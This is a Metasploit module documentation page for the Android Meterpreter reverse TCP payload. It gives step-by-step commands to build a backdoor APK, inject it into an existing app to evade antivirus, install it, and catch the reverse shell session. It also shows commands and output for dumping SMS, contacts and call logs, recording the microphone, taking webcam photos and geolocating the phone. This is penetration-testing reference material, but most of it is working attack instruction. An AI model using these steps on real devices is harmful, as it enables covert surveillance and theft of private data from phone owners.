Android Meterpreter, Android Reverse TCP Stager - Metasploit
This page contains detailed information about how to use the payload/android/meterpreter/reverse_tcp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Android Meterpreter, Android Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Source code: modules/payloads/stagers/android/reverse_tcp.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): dalvik
Supported platform(s): Android
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Run a meterpreter server in Android. Connect back stager
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
... show and set options ...
msf payload(reverse_tcp) > generate
To learn how to generate payload/android/meterpreter/reverse_tcp with msfvenom, please read this.
Required Options
- LHOST: The listen address (an interface may be specified)
Knowledge Base
The android/meterpreter/reverse_tcp payload is a Java-based Meterpreter that can be used on an Android device. It is still at an early stage of development, but there are so many things you can do with it already.
The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.
Vulnerable Application
You can test android/meterpreter/reverse_tcp on these devices:
Android Emulator
An emulator is the most convenient way to test Android Meterpreter. You can try:
- Android SDK - Creates and manages your emulators from a command prompt or terminal.
- Android Studio - Allows you to manage emulators more easily than the SDK.
- GenyMotion - Requires an account.
- AndroidAVDRepo - Contains a collection of pre-configured emulators.
A real Android device
Having a real Android device allows you to test features or vulnerabilities you don't necessarily have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also get to test it over a real network.
Verification Steps
Currently, the most common way to use Android Meterpreter is to create it as an APK, and then execute it.
To create the APK with msfconsole:
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.1.199
LHOST => 192.168.1.199
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
[*] Writing 8992 bytes to /tmp/android.apk...
msf payload(reverse_tcp) >
To create the APK with msfvenom:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
To inject meterpreter into an existing APK with msfvenom:
You can also add Android meterpreter to any existing APK. This will make it harder for Anti-virus software to detect the payload, and allow you read internal files and take screenshots of the Android app that you are backdooring:
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
Please see here for more documentation on Android injection.
Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, so please refer to the Scenarios section for more information.
Important Basic Commands
pwd
The pwd
command allows you to see the current directory you're in.
meterpreter > pwd
/data/data/com.metasploit.stage
cd
The cd
command allows you to change directory. For example:
meterpreter > cd cache
meterpreter > ls
cat
The cat
command allows you to see the contents of a file.
ls
The ls
command displays items in a directory. For example:
meterpreter > ls
Listing: /data/data/com.metasploit.stage/files
==============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil 2016-03-08 14:56:08 -0600 rList-com.metasploit.stage.MainActivity
upload
The upload
command allows you to upload a file to the remote target. The -r
option
allows you to do so recursively.
download
The download
command allows you to download a file from the remote target. The -r
option allows you to do so recursively.
search
The search
command allows you to find files on the remote target. For example:
meterpreter > search -d . -f *.txt
ifconfig
The ifconfig
command displays the network interfaces on the remote machine.
meterpreter > ifconfig
...
Interface 10
============
Name : wlan0 - wlan0
Hardware MAC : 60:f1:89:07:c2:7e
IPv4 Address : 192.168.1.207
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : fe80::62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954
IPv6 Netmask : ::
...
getuid
The getuid
command shows the current user that the payload is running as:
meterpreter > getuid
Server username: u0_a231
ps
The ps
command shows a list of processes the Android device is running. For example:
meterpreter > ps
Process List
============
PID Name Arch User
--- ---- ---- ----
1 /init root
2 kthreadd root
3 ksoftirqd/0 root
7 migration/0 root
8 rcu_preempt root
9 rcu_bh root
10 rcu_sched root
11 watchdog/0 root
12 watchdog/1 root
13 migration/1 root
14 ksoftirqd/1 root
17 watchdog/2 root
18 migration/2 root
19 ksoftirqd/2 root
22 watchdog/3 root
23 migration/3 root
...
shell
The shell
command allows you to interact with a shell:
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0
To get back to the Meterpreter prompt, you can do: [CTRL]+[Z]
sysinfo
The sysinfo
command shows you basic information about the Android device.
meterpreter > sysinfo
Computer : localhost
OS : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Meterpreter : java/android
webcam_list
The webcam_list
command shows a list of webcams you could use for the webcam_snap
command. Example:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
webcam_snap
The webcam_snap
command takes a picture from the device. You will have to use the
webcam_list
command to figure out which camera to use. Example:
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
record_mic
The record_mic
command records audio. Good for listening to a phone conversation, as well as
other uses. Example:
meterpreter > record_mic -d 20
[*] Starting...
[*] Stopped
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
activity_start
The activity_start
command is an execute command by starting an Android activity from a URI
string.
check_root
The check_root
command detects whether your payload is running as root or not. Example:
meterpreter > check_root
[*] Device is not rooted
dump_calllog
The dump_calllog
command retrieves the call log from the Android device.
dump_contacts
meterpreter > dump_contacts
[*] Fetching 5 contacts into list
[*] Contacts list saved to: contacts_dump_20160308155744.txt
geolocate
The geolocate
commands allows you to locate the phone by retrieving the current lat-long
using geolocation.
wlan_geolocate
The wlan_geolocation
command allows you to locate the phone by retrieving the current
lat-long using WLAN information. Example:
meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
[*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.*******
send_sms
The send_sms
command allows you to send an SMS message. Keep in mind the phone will keep a
copy of it, too.
meterpreter > send_sms -d "2674554859" -t "hello"
[+] SMS sent - Transmission successful
sms_dump
The sms_dump
command allows you to retrieve SMS messages. And save them as a text file.
For example:
meterpreter > dump_sms
[*] Fetching 4 sms messages
[*] SMS messages saved to: sms_dump_20160308163212.txt
...
$ cat sms_dump_20160308163212.txt
=====================
[+] SMS messages dump
=====================
Date: 2016-03-08 15:30:12 -0600
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Remote IP: 192.168.1.207
Remote Port: 59130
#1
Type : Incoming
Date : 2016-03-08 15:29:32
Address : **********
Status : NOT_RECEIVED
Message : Hello world
...
run
The run
command allows you to run a post module against the remote machine at the Meterpreter
prompt. For example:
meterpreter > run post/android/capture/screen
Scenarios
Uploading APK to an Emulator using install_msf_apk.sh
The Metasploit Framework comes with a script that allows you to automatically upload your APK to an active emulator and execute it. It requires the Android SDK platform-tools to run, as well as Java.
To use this, follow these steps:
- Start the Android Emulator
- Generate the Android payload as an APK.
- In msfconsole, start a handler for android/meterpreter/reverse_tcp
- Run the installer script like this from a terminal:
$ tools/exploit/install_msf_apk.sh /tmp/android.apk
The the script will do something like this:
$ tools/exploit/install_msf_apk.sh /tmp/android.apk
adding: META-INF/ANDROIDD.SF
adding: META-INF/ANDROIDD.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
Failure
1562 KB/s (10715 bytes in 0.006s)
pkg: /data/local/tmp/android.apk
Success
rm failed for -f, Read-only file system
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Back in msfconsole, you should receive a session:
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] Starting the payload handler...
[*] Sending stage (62432 bytes) to 192.168.1.199
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600
meterpreter >
Uploading APK to a real Android device using install_msf_apk.sh
On the Android device, make sure to enable Developer Options. To do this:
- Go to Settings -> About -> Software Information
- Tap on the Build Number section a couple of times. It should unlock Developer Options.
- Go back to the Settings page, you should see Developer Options.
Under Developer Options, make sure to:
- Enable USB debugging
- Disable Verify apps via USB
- Open a terminal, and type:
adb devices
. On your Android device, you should see a prompt asking you to allow the computer for debugging, click OK on that. - Do:
adb devices
again, adb should now have access.
Run the installer script like this from a terminal:
$ tools/exploit/install_msf_apk.sh /tmp/android.apk
And you should get a session.
Uploading APK from a Web Server
One way to upload an APK to Android without adb is by hosting it from a web server. To do this, you must make sure to allow to trust "Unknown sources". The way to do this varies, but normally it's something like this: Settings -> Security -> Check "Unknown Sources"
Once you have that changed, you'll need to:
- Generate the APK payload.
- Start a web server from the directory where the payload is:
ruby -run -e httpd . -p 8181
- On your Android device, open a browser, and download the APK.
- You should be able to find the APK from the Downloads folder, install it.
- After installation, you will have to manually execute it.
Reconnect Android Meterpreter from the Browser Remotely
When you have the APK payload installed on your Android device, another trick to reconnect it is to launch an intent from a browser. An intent is simply a term in Android development that means "an operation to be performed."
Here's how you do this:
- In msfconsole, start a multi/handler for android/meterpreter/reverse_tcp as a background job.
- Do:
auxiliary/server/android_browsable_msf_launch
. - Set the URIPATh if needed.
- Do:
run
. At this point, the web server should be up. - On your Android device, open the native web browser, and go the URL generated by the auxiliary module.
- The Android handler should get a session like the following demo:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.199
LHOST => 192.168.1.199
msf exploit(handler) > set EXITONSESSION false
EXITONSESSION => false
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.199:4444
msf exploit(handler) > [*] Starting the payload handler...
msf exploit(handler) > use auxiliary/server/android_browsable_msf_launch
msf auxiliary(android_browsable_msf_launch) > set URIPATH /test
URIPATH => /test
msf auxiliary(android_browsable_msf_launch) > run
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.199:8080/test
[*] Server started.
[*] Sending HTML...
[*] Sending stage (62432 bytes) to 192.168.1.207
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.207:47523) at 2016-03-08 15:09:25 -0600
Go back to menu.
Msfconsole Usage
Here is how the android/meterpreter/reverse_tcp payload looks in the msfconsole:
msf6 > use payload/android/meterpreter/reverse_tcp
msf6 payload(android/meterpreter/reverse_tcp) > show info
Name: Android Meterpreter, Android Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 10176
Rank: Normal
Provided by:
mihi
egypt <[email protected]>
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in Android. Connect back stager
Module Options
This is a complete list of options available in the android/meterpreter/reverse_tcp payload:
msf6 payload(android/meterpreter/reverse_tcp) > show options
Module options (payload/android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Advanced Options
Here is a complete list of advanced options supported by the android/meterpreter/reverse_tcp payload:
msf6 payload(android/meterpreter/reverse_tcp) > show advanced
Module advanced options (payload/android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Go back to menu.
Related Pull Requests
- #14584 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/base
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7634 Merged Pull Request: Implement universal HTTP/S handlers for Meterpreter payloads
- #7292 Merged Pull Request: add android stageless meterpreter_reverse_tcp
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #5608 Merged Pull Request: Android and Java transport resiliency, hot swapping, sleep handling, and timeout management
- #5348 Merged Pull Request: Feature/msp 12358/ntds dump module
- #5367 Merged Pull Request: Create new UUID stagers
- #2525 Merged Pull Request: Change module boilerplate
- #1708 Merged Pull Request: android meterpreter
Go back to menu.
See Also
Check also the following modules related to this module:
- payload/android/meterpreter/reverse_http
- payload/android/meterpreter_reverse_http
- payload/android/meterpreter/reverse_https
- payload/android/meterpreter_reverse_https
- payload/android/meterpreter_reverse_tcp
- payload/android/shell/reverse_http
- payload/android/shell/reverse_https
- payload/android/shell/reverse_tcp
Authors
- mihi
- egypt
- OJ Reeves
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.